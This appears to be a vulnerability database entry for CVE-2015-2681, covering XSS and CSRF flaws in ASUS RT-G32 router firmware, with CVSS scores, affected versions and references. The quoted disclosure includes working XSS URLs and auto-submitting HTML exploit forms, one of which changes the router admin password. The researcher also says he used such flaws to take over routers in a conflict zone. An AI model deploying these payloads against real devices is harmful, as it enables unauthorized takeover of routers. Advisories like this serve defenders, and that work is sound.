Sign-up

ID

VAR-201503-0303


CVE

CVE-2015-2681


TITLE

Asus RT-G32 Router Cross-Site Scripting Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2015-01955 // CNNVD: CNNVD-201503-426

DESCRIPTION

Multiple cross-site scripting (XSS) vulnerabilities in the ASUS RT-G32 routers with firmware 2.0.2.6 and 2.0.3.2 allow remote attackers to inject arbitrary web script or HTML via the (1) next_page, (2) group_id, (3) action_script, or (4) flag parameter to start_apply.htm. (1) next_page Parameters (2) group_id Parameters (3) action_script Parameters (4) flag Parameters. ASUS RT-G32 is a wireless router product from ASUS. An attacker may exploit these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, perform unauthorized actions, and disclose or modify sensitive information. ---------- Details: ---------- Cross-Site Scripting (WASC-08): http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27 http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27 http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27 These vulnerabilities work as via GET, as via POST (work even without authorization). ASUS RT-G32 XSS-1.html <html> <head> <title>ASUS RT-G32 XSS exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="next_page" value="'+alert(document.cookie)+'"> <input type="hidden" name="group_id" value="'+alert(document.cookie)+'"> <input type="hidden" name="action_script" value="'+alert(document.cookie)+'"> <input type="hidden" name="flag" value="'+alert(document.cookie)+'"> </form> </body> </html> Cross-Site Request Forgery (WASC-09): CSRF vulnerability allows to change different settings, including admin's password. As I showed in this exploit (post-auth). ASUS RT-G32 CSRF-1.html <html> <head> <title>ASUS RT-G32 CSRF exploit (C) 2015 MustLive</title> </head> <body onLoad="document.hack.submit()"> <form name="hack" action="http://site/start_apply.htm" method="post"> <input type="hidden" name="http_passwd" value="admin"> <input type="hidden" name="http_passwd2" value="admin"> <input type="hidden" name="v_password2" value="admin"> <input type="hidden" name="action_mode" value="+Apply+"> </form> </body> </html> I found this and other routers since summer to take control over terrorists in Crimea, Donetsk & Lugansks regions of Ukraine. Read about it in the list (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-February/009077.html) and in many my interviews (http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html). I mentioned about these vulnerabilities at my site (http://websecurity.com.ua/7644/). Best wishes & regards, MustLive Administrator of Websecurity web site http://websecurity.com.ua

Trust: 2.61

sources: NVD: CVE-2015-2681 // JVNDB: JVNDB-2015-001914 // CNVD: CNVD-2015-01955 // BID: 73296 // VULHUB: VHN-80642 // PACKETSTORM: 130724

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2015-01955

AFFECTED PRODUCTS

vendor:asusmodel:rt-g32scope:eqversion:2.0.2.6

Trust: 2.5

vendor:asusmodel:rt-g32scope:eqversion:2.0.3.2

Trust: 2.5

vendor:asustek computermodel:rt-g32scope: - version: -

Trust: 0.8

vendor:asustek computermodel:rt-g32scope:eqversion:2.0.2.6

Trust: 0.8

vendor:asustek computermodel:rt-g32scope:eqversion:2.0.3.2

Trust: 0.8

sources: CNVD: CNVD-2015-01955 // BID: 73296 // JVNDB: JVNDB-2015-001914 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2015-2681
value: MEDIUM

Trust: 1.0

NVD: CVE-2015-2681
value: MEDIUM

Trust: 0.8

CNVD: CNVD-2015-01955
value: MEDIUM

Trust: 0.6

CNNVD: CNNVD-201503-426
value: MEDIUM

Trust: 0.6

VULHUB: VHN-80642
value: MEDIUM

Trust: 0.1

nvd@nist.gov: CVE-2015-2681
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.8

CNVD: CNVD-2015-01955
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-80642
severity: MEDIUM
baseScore: 4.3
vectorString: AV:N/AC:M/AU:N/C:N/I:P/A:N
accessVector: NETWORK
accessComplexity: MEDIUM
authentication: NONE
confidentialityImpact: NONE
integrityImpact: PARTIAL
availabilityImpact: NONE
exploitabilityScore: 8.6
impactScore: 2.9
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

sources: CNVD: CNVD-2015-01955 // VULHUB: VHN-80642 // JVNDB: JVNDB-2015-001914 // CNNVD: CNNVD-201503-426 // NVD: CVE-2015-2681

PROBLEMTYPE DATA

problemtype:CWE-79

Trust: 1.9

sources: VULHUB: VHN-80642 // JVNDB: JVNDB-2015-001914 // NVD: CVE-2015-2681

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201503-426

TYPE

XSS

Trust: 0.6

sources: CNNVD: CNNVD-201503-426

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2015-001914

PATCH
title:RT-G32url:http://www.asus.com/Networking/RTG32/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2015-001914

EXTERNAL IDS
db:NVDid:CVE-2015-2681
Trust: 3.4
db:PACKETSTORMid:130724
Trust: 3.2
db:BIDid:73296
Trust: 1.4
db:JVNDBid:JVNDB-2015-001914
Trust: 0.8
db:CNNVDid:CNNVD-201503-426
Trust: 0.7
db:CNVDid:CNVD-2015-01955
Trust: 0.6
db:VULHUBid:VHN-80642
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-01955 // 
            
            
            
            VULHUB: VHN-80642 // 
            
            
            
            BID: 73296 // 
            
            
            
            JVNDB: JVNDB-2015-001914 // 
            
            
            
            PACKETSTORM: 130724 // 
            
            
            
            CNNVD: CNNVD-201503-426 // 
            
            
            
            NVD: CVE-2015-2681

REFERENCES
url:http://websecurity.com.ua/7644/
Trust: 3.1
url:http://packetstormsecurity.com/files/130724/asus-rt-g32-cross-site-request-forgery-cross-site-scripting.html
Trust: 3.1
url:http://seclists.org/fulldisclosure/2015/mar/42
Trust: 2.3
url:http://www.securityfocus.com/bid/73296
Trust: 1.1
url:http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2681
Trust: 0.8
url:http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2681
Trust: 0.8
url:http://www.asus.com/
Trust: 0.3
url:http://www.asus.com/networking/rtg32/
Trust: 0.3
url:http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2015-february/009077.html)
Trust: 0.1
url:http://websecurity.com.ua
Trust: 0.1
url:http://site/start_apply.htm?next_page=%27%2balert(document.cookie)%2b%27
Trust: 0.1
url:http://websecurity.com.ua/7644/).
Trust: 0.1
url:http://site/start_apply.htm?flag=%27%2balert%28document.cookie%29%2b%27
Trust: 0.1
url:http://www.thedailybeast.com/articles/2015/02/18/ukraine-s-lonely-cyber-warrior.html).
Trust: 0.1
url:http://site/start_apply.htm?action_script=%27%2balert%28document.cookie%29%2b%27
Trust: 0.1
url:http://site/start_apply.htm?group_id=%27%2balert(document.cookie)%2b%27
Trust: 0.1
url:http://site/start_apply.htm"
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2015-01955 // 
            
            
            
            VULHUB: VHN-80642 // 
            
            
            
            BID: 73296 // 
            
            
            
            JVNDB: JVNDB-2015-001914 // 
            
            
            
            PACKETSTORM: 130724 // 
            
            
            
            CNNVD: CNNVD-201503-426 // 
            
            
            
            NVD: CVE-2015-2681

CREDITS
MustLive
Trust: 0.4
sources:
            
            
            BID: 73296 // 
            
            
            
            PACKETSTORM: 130724

SOURCES
db:CNVDid:CNVD-2015-01955
db:VULHUBid:VHN-80642
db:BIDid:73296
db:JVNDBid:JVNDB-2015-001914
db:PACKETSTORMid:130724
db:CNNVDid:CNNVD-201503-426
db:NVDid:CVE-2015-2681

LAST UPDATE DATE
2024-11-23T21:44:25.751000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2015-01955date:2015-03-25T00:00:00
db:VULHUBid:VHN-80642date:2016-12-03T00:00:00
db:BIDid:73296date:2015-03-24T00:00:00
db:JVNDBid:JVNDB-2015-001914date:2015-03-25T00:00:00
db:CNNVDid:CNNVD-201503-426date:2015-03-24T00:00:00
db:NVDid:CVE-2015-2681date:2024-11-21T02:27:50.530

SOURCES RELEASE DATE
db:CNVDid:CNVD-2015-01955date:2015-03-25T00:00:00
db:VULHUBid:VHN-80642date:2015-03-23T00:00:00
db:BIDid:73296date:2015-03-24T00:00:00
db:JVNDBid:JVNDB-2015-001914date:2015-03-25T00:00:00
db:PACKETSTORMid:130724date:2015-03-07T11:11:11
db:CNNVDid:CNNVD-201503-426date:2015-03-24T00:00:00
db:NVDid:CVE-2015-2681date:2015-03-23T16:59:09.523